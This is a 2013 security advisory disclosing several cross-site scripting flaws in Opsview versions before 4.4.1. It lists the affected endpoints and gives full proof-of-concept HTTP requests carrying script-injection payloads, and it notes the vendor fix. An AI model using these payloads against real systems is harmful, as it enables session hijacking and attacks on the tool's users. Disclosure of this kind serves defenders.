CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View Version(s): Opsview pre 4.4.1 Author: J. Oquendo (joquendo at e-fensive dot net) I. ADVISORY Title: Multilple Cross Site Scripting (XSS) Attacks in Ops View Date published: 2013-10-28 Vendor contacted: 2013-09-04 II. BACKGROUND Opsview is a systems management software built on open source software. To minimize noise, read more about it here http://www.opsview.com/about-us II. DESCRIPTION Opsview is vulnerable to a few different XSS based attacks. /admin/auditlog /info/host/ /login /status/service/recheck /viewport/ There are a variety of iterations within those functions which may allow a malicious user to trigger a cross site scripting attack. III. EXAMPLE GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT HERE%3e HTTP/1.1 Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] ------------ GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1 Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] ------------ POST /login HTTP/1.1 Content-Length: 125 Content-Type: application/x-www-form-urlencoded Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] app=OPSVIEW&back=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&login=Sign+in&login_password=no&login_username=no ------------ POST /status/service/recheck HTTP/1.1 Content-Length: 144 Content-Type: application/x-www-form-urlencoded User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] &from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&host_selection=opsview&service_selection=opsview%3bConnectivity%20-%20LAN&submit=Submit ------------ GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1 Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] III SOLUTION Opsview released a fix with Opsview 4.4.1 http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM "Where ignorance is our master, there is no possibility of real peace" - Dalai Lama 42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF